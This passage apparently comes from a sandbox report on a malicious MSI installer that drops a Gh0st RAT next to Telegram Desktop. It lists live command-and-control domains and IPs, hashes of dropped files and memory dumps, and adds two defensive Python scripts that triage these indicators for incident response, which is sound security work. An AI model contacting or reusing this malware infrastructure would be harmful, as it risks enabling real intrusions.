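Destination, optional Domain, Proto). ALLOWLIST is an analyst-supplied
assumption: traffic to those suffixes is attributed to the bundled Telegram
Desktop client and its DoH probe rather than to the RAT.
"""
import re
from collections import Counter, defaultdict

REPORT_ROWS = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 im.qq.com udp
US 8.8.8.8:53 dsfgdg5641rfe.icu udp
HK 38.47.221.100:80 dsfgdg5641rfe.icu tcp
US 8.8.8.8:53 100.221.47.38.in-addr.arpa udp
HK 27.124.9.39:13000 tcp
US 8.8.8.8:53 39.9.124.27.in-addr.arpa udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
HK 27.124.9.39:13000 tcp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
NL 149.154.167.51:443 tcp
US 8.8.8.8:53 td.telegram.org udp
NL 149.154.167.99:443 td.telegram.org tcp
US 8.8.8.8:53 mozilla.cloudflare-dns.com udp
US 172.64.41.4:443 mozilla.cloudflare-dns.com tcp
"""

ALLOWLIST = ("telegram.org", "cloudflare-dns.com")  # assumption, see docstring

PTR_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa$")


def parse_rows(text):
    """Tokenise rows; Domain is the third column only when four tokens exist."""
    rows = []
    for line in text.splitlines():
        tok = line.split()
        if len(tok) < 3 or ":" not in tok[1]:
            continue  # header or malformed line
        ip, _, port = tok[1].rpartition(":")
        rows.append({"cc": tok[0], "ip": ip, "port": int(port),
                     "domain": tok[2] if len(tok) == 4 else "",
                     "proto": tok[-1].lower()})
    return rows


def ptr_to_ip(name):
    """'100.221.47.38.in-addr.arpa' -> '38.47.221.100'; None for a forward name."""
    m = PTR_RE.match(name)
    return ".".join(reversed(m.groups())) if m else None


def is_allowlisted(domain):
    return any(domain == s or domain.endswith("." + s) for s in ALLOWLIST)


def triage(text):
    rows = parse_rows(text)
    queries = Counter()          # forward lookups by name
    ptr_targets = set()          # IPs the sandbox reverse-resolved (noise)
    conns = defaultdict(set)     # (ip, port) -> names the report tied to it
    for r in rows:
        if r["port"] == 53 and r["proto"] == "udp":
            ip = ptr_to_ip(r["domain"])
            if ip:
                ptr_targets.add(ip)
            elif r["domain"]:
                queries[r["domain"]] += 1
        else:
            conns[(r["ip"], r["port"])].add(r["domain"])
    contacted = {d for names in conns.values() for d in names if d}
    return {
        # connections with no allowlisted name attached: unnamed ones need IP/ASN enrichment
        "suspect_connections": sorted(k for k, names in conns.items()
                                      if not any(is_allowlisted(d) for d in names if d)),
        "nonstandard_ports": sorted(k for k in conns if k[1] not in (80, 443)),
        "queried_never_contacted": sorted(d for d in queries
                                          if d not in contacted and not is_allowlisted(d)),
        "query_counts": dict(queries),
        "sandbox_ptr_targets": sorted(ptr_targets),
    }
```

On the full table the same split holds: dsfgdg5641rfe.icu resolves and is contacted on 38.47.221.100:80, 27.124.9.39:13000 is reached twice with no name at all, and fdg156fdg.cyou and qdfbvccc.cyou are queried dozens of times without a single TCP row, which is what a dead or not-yet-registered fallback C2 name looks like in a sandbox. An unnamed 443 connection such as 149.154.167.51 lands in the suspect bucket because the table gives nothing to clear it with; that is a prompt for enrichment, not a verdict.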

Files

memory/2172-18-0x000002A7D4620000-0x000002A7D4642000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_afikessb.5p4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

\??\Volume{0576a638-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{b3375395-ff67-42fa-8ddf-eeb043c5d8de}_OnDiskSnapshotProp

MD5 a78282738825f10d999ee4fc570ef470
SHA1 f5fe745cd21569af7c4c0e4152b1fe43f5d1cbc6
SHA256 182eaf80a73bd48865f404ec41b3a0ce76eed0c5b80adcfdcdaccbe5d37e31de
SHA512 1cdc7afd52e5c952f14c32df9ef9c87d1392dfcfcc8d117208e99f37262030fd0b63a8f703690158b77dc8606c1a51d35d5333659224e215ceb270a1d786af6b

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 0fbe39f8a2b6bd7ed669d351140493df
SHA1 b861a2f9153be144bd3ec8d97fa298727cc6b817
SHA256 0f04578df48d9bfaccd14d60dcb6e9d749f67e0d61ce669f8ca1cba185e53533
SHA512 166b2c04e1e11aad5ee9ba5207183c3f4a73991ea53545bbeb569ea28fe8bd8784df93b83f279d8f33391dfcd69c5a69dd6fb3454626d513a0a70f7356c3da3b

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

MD5 c31c4b04558396c6fabab64dcf366534
SHA1 fa836d92edc577d6a17ded47641ba1938589b09a
SHA256 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg

MD5 86e0062ac9e3c38a69470a57bb619533
SHA1 7d04a283f51e145724e20a5925ee811a4645e5d9
SHA256 42a64f04499a0836946073eb7bfc1cb67a98faa58d65eeb09fb6ac8fccc7f547
SHA512 aefc23fcf566748b60de0e95268f834cef3e4cfb1754b18e9ea2e1a867a764d027d43c68aad2b7c3f4520b3232fd50430c2b7fb4494dee223ac340a8c1e67794

C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf

MD5 17f3ece27717fa4a5ad13f06e6c2846e
SHA1 47b8230c0f0dd0b8a451bd378203a0ec0aaa13f6
SHA256 f0217b72add9c431299fda7983e8a7c592f6b4cd5a1df5118208c19dc7251c86
SHA512 998dcba619566edba18b2dcaefd8e86d1d6c09340c8004cf487d6944bb2a90b75231f2d3140162bcf0a161321d5febccf7d947d4752451424082f3cd06de9b7b

C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe

MD5 90134a5b913cd5d9d993f6f58601740e
SHA1 c6fc923eae06097227dab095633a0c47beba327a
SHA256 8462d6b3f1a8037f6f60412d3f4e0ecad89aaed3c10915ffa1e602c5ae8b0942
SHA512 7385ebcce7e33efb3a9b26d9690d8a2a221bc05071bc499f313de2de8d31935dd0cdd366ac7baccd4004d9e1eb27a0471328785ad1acf325054fd036d4b9dd61

C:\Program Files\SustainSleekTutor\tsetup.exe

MD5 8a53cf72375f6899082463c36422d411
SHA1 161d9d3b21bf0d9a9790b92013ec76c6d839af06
SHA256 1b31e3758c4b158143dc41c7c4617984d958760d8d7718e1e38492c67f6bbf65
SHA512 daadba04fb90002a2cb8e44c1b98d6bf702b9cfe33d3b6dc981c877e0a77c620f2538a2748f2fb4e88493e326cc45764c54dad659d8d2d018b74b24fd727a190

memory/2556-56-0x0000000029A90000-0x0000000029ABF000-memory.dmp

memory/1440-59-0x0000000000400000-0x00000000004D4000-memory.dmp

C:\Windows\Installer\e57b805.msi

MD5 7ba3fd79c3ccfdb9f1a311a3f05a7d94
SHA1 c4115a8d08ce102bcb14ed00dad86e52e163c81c
SHA256 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf
SHA512 f491a16cc375d6756e2debed08e76f01c090ae52b16e7b3eeed2930e0eb8e47e56aada96b54a6dfaa212354d66ca92955a4fc39434a378429f54416f5043048c

C:\Config.Msi\e57b806.rbs

MD5 6f1d258ed53343d54331cf70ff3ed7a9
SHA1 9475f6a4c5106b539108727be0732961ed112583
SHA256 5fc9dddaa2f55e79886a7a3e856aecba74e31f5a36e354adef118f4ad325ed0d
SHA512 6c227d6af836c57ee5e3bd64524f5faf1e56983062f705123201ba83bc261aca3883f41fb650813454aca243d641a25799a0e867c9ee5649bf59bda7a31a5ad0

C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp

MD5 d90927477dbf0725af0a10e151c184c4
SHA1 4cd69b23ee9c1efe9bd539f0fef841a09a4a773e
SHA256 43182a0ae7e22cc7f9b8028dc71e82826c80e9ac265f8d2dfa08876bb41b7029
SHA512 bfbd62482e99127c1bf621a135b464b5f96b86adfcb9064660c0dc1052099643ea9485e1358a758ab466f19c97042dafccb781e157203ea51e43956e4b6f4f98

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe

MD5 d305d506c0095df8af223ac7d91ca327
SHA1 679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a
SHA256 923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66
SHA512 94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs

MD5 615235ef40ac677be4c414e7dfb9ff53
SHA1 ef7cea67851aed94a5e14e9b907f366d1185e172
SHA256 1a7dd87bb537e41f7742da7cbb9839523d905747aad4522f4a39932ba626a132
SHA512 c694a4cf03ce5587e164b4f31b141951b949281f8ba08a69178f56c290afbbbe139651a849f3436976ee7c29b6aa0408b60c7e529a44c8c4bc52aff0498ae89b

memory/4060-80-0x0000000000760000-0x0000000000836000-memory.dmp

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml

MD5 a64dd3b12bb2c5bc00fb61a6c9ddcc8d
SHA1 27b65d6e3c47cefd0d21e9412185601d03a2756f
SHA256 73c03e24b2378cd1a660ac8127f44edae43ee31a73092afb88bd617b9638db9f
SHA512 8824bb6e846c9ee4e5ef3bf0373dcd0b513aa5f91d3858a5e34868b1f72f7052dc55776d0cd40154fe4f1dc160ea7d7324872e6e7e8a265db294e53f36878e39

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UhHKDmESOIjj.exe.log

MD5 122cf3c4f3452a55a92edee78316e071
SHA1 f2caa36d483076c92d17224cf92e260516b3cbbf
SHA256 42f5774d1ee4cae5d7a4e83970da42bb17e61ae93c312247211b5ee3535662e0
SHA512 c98666fb86aaff6471c0a96f12f037b9a607579c5891c9d7ba8cd4e90506ca7aa5b5f6264081d25f703c88fb69d8e2cd87809d508e771770550d0c5d4d17d91c

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 4e14ff5f867de1777b6aae7a48fe1c3f
SHA1 17d8f1b5b4bc4c9517e9c1e412c7f4e488e7be1e
SHA256 ac2082ba3c3e67110f6bc8744b93b1990c0b5514122b2c64fe99e3fa18432f74
SHA512 7f013d0ec64f226896177a455d7951358f2bb99c51ebd5be7e9e7dffaa048294b384cde65b609eaa09adb3c4372aead5edb623c89a37de5275d213ac852c4038

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 7f378affecbfdafd347579ead10eb494
SHA1 9c8c93a6198d044716bc7fed12ca0728bd4e7f4e
SHA256 7788cb38dd7f69889108d8043a0a642b87a20bd6a6cc215e8ef753e39906a7ab
SHA512 2ce6a99b54dcb6179e23e44a1fbd765326ad5891e859d1493647a2dc9bb5103ca5a595458e5ad31f6f25a1426c096df48e0b430e4daf8dd854928ff066310258

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 c01617b7e98a81d6b5d97283db538ee8
SHA1 f4b9e42359f7c6a19bd8cd73fad8ad20151c5d90
SHA256 935799d2ea92630d9dd31ff897df8ed66f5703830ddd4fe6797f739dbc0e2249
SHA512 af39c698b9197d9081f163f523b6079b48a4f852d5a7fb45a445d6d7b6c3a6cc031fbbadd0ea1cd865bd0a39bc78f0e0692c09b1a952ff2fb350293b3ba494fe

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 a8a628af93c38728740972e112c50971
SHA1 519706dcfe4462e3a70ff8fb9ad983cfded94e78
SHA256 441c3e40d60b2e7785c935b75657b55cc289cfab8c6cf1cc032202108e0ba30c
SHA512 0e3ba923a4e8d4d34fbae9c80a4311f1ca4fb9432865e33ffc349f5b91f4051c588514233ac69e02ce0aefdd763baf6d0827f5eb25376383056299192b6a43cf

memory/3492-111-0x000000002A290000-0x000000002A2DD000-memory.dmp

memory/1440-112-0x0000000000400000-0x00000000004D4000-memory.dmp

memory/2052-113-0x0000000000400000-0x0000000000710000-memory.dmp

memory/3492-114-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/3492-117-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/3492-116-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/3492-118-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/3492-121-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/2052-124-0x0000000000400000-0x0000000000710000-memory.dmp

memory/3492-125-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/2052-133-0x0000000000400000-0x0000000000710000-memory.dmp

C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll

MD5 a7349236212b0e5cec2978f2cfa49a1a
SHA1 5abb08949162fd1985b89ffad40aaf5fc769017e
SHA256 a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082
SHA512 c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

memory/2052-158-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1440-159-0x0000000000400000-0x00000000004D4000-memory.dmp
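The Files list interleaves three kinds of entry: files written to disk (a path line followed by MD5/SHA1/SHA256/SHA512), the same path repeated when its content changed during the run (UhHKDmESOIjj.wrapper.log appears four times with four different hashes), and memory dumps named `memory/<pid>-<seq>-<start>-<end>-memory.dmp`. The parser below is an added example for this page, not part of the sandbox report or of any tool it names; it reads a subset of the list copied verbatim and answers the questions a responder asks of it: which entries are the dropped payload under the install directory the MSI created, which paths were rewritten, where the submitted sample itself was cached (the Windows Installer copy carries the same SHA256 as the sample in the header), and which processes were dumped and how large each region was. INSTALL_DIR and SAMPLE_SHA256 are taken from the report; the entry layout is assumed to be exactly as printed.

```python
"""Parse the Files list above into usable indicators.

Added example for this page; not part of the sandbox report or of any tool
it names. REPORT_FILES is a subset of the list copied verbatim, in the
layout printed above. INSTALL_DIR and SAMPLE_SHA256 come from the report.
"""
import re
from collections import defaultdict

SAMPLE_SHA256 = "92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf"
INSTALL_DIR = r"C:\Program Files\SustainSleekTutor"

REPORT_FILES = r"""
memory/2172-18-0x000002A7D4620000-0x000002A7D4642000-memory.dmp

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

MD5 c31c4b04558396c6fabab64dcf366534
SHA1 fa836d92edc577d6a17ded47641ba1938589b09a
SHA256 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

C:\Windows\Installer\e57b805.msi

MD5 7ba3fd79c3ccfdb9f1a311a3f05a7d94
SHA1 c4115a8d08ce102bcb14ed00dad86e52e163c81c
SHA256 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf
SHA512 f491a16cc375d6756e2debed08e76f01c090ae52b16e7b3eeed2930e0eb8e47e56aada96b54a6dfaa212354d66ca92955a4fc39434a378429f54416f5043048c

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 4e14ff5f867de1777b6aae7a48fe1c3f
SHA1 17d8f1b5b4bc4c9517e9c1e412c7f4e488e7be1e
SHA256 ac2082ba3c3e67110f6bc8744b93b1990c0b5514122b2c64fe99e3fa18432f74
SHA512 7f013d0ec64f226896177a455d7951358f2bb99c51ebd5be7e9e7dffaa048294b384cde65b609eaa09adb3c4372aead5edb623c89a37de5275d213ac852c4038

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 7f378affecbfdafd347579ead10eb494
SHA1 9c8c93a6198d044716bc7fed12ca0728bd4e7f4e
SHA256 7788cb38dd7f69889108d8043a0a642b87a20bd6a6cc215e8ef753e39906a7ab
SHA512 2ce6a99b54dcb6179e23e44a1fbd765326ad5891e859d1493647a2dc9bb5103ca5a595458e5ad31f6f25a1426c096df48e0b430e4daf8dd854928ff066310258

memory/3492-114-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/3492-117-0x000000002BEC0000-0x000000002C07C000-memory.dmp
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def parse_files(text):
    """Return (file_entries, memory_dumps) from the list as printed."""
    files, dumps, cur = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = DUMP_RE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            dumps.append({"pid": int(pid), "seq": int(seq), "start": int(start, 16),
                          "size": int(end, 16) - int(start, 16)})
            cur = None
            continue
        m = HASH_RE.match(line)
        if m:
            if cur is not None:          # hash lines belong to the preceding path
                cur[m.group(1).lower()] = m.group(2).lower()
            continue
        cur = {"path": line}             # any other non-empty line starts a new entry
        files.append(cur)
    return files, dumps


def dropped_payload(files):
    """Entries written under the install directory the MSI created."""
    prefix = INSTALL_DIR.lower() + "\\"
    return [f for f in files if f["path"].lower().startswith(prefix)]


def rewritten_paths(files):
    """Paths listed with more than one SHA256, i.e. rewritten during the run."""
    seen = defaultdict(set)
    for f in files:
        if "sha256" in f:
            seen[f["path"]].add(f["sha256"])
    return {p: sorted(h) for p, h in seen.items() if len(h) > 1}


def sample_copies(files, sha256=SAMPLE_SHA256):
    """Where the submitted sample itself landed on disk."""
    return [f["path"] for f in files if f.get("sha256") == sha256.lower()]


def dumps_by_pid(dumps):
    """pid -> [(seq, start, size)] so repeated dumps of one region are visible."""
    out = defaultdict(list)
    for d in dumps:
        out[d["pid"]].append((d["seq"], d["start"], d["size"]))
    return {pid: sorted(v) for pid, v in out.items()}
```

Run over the full list, `rewritten_paths` returns only the wrapper log, which is the one file the report shows changing as UhHKDmESOIjj.exe is called with `install`, `start` and then bare; `dumps_by_pid` shows PID 3492 dumped repeatedly at the same 0x2BEC0000 region and PIDs 1440 and 2052 at their image base, which is where to start when carving the Gh0st payload out of the dumps.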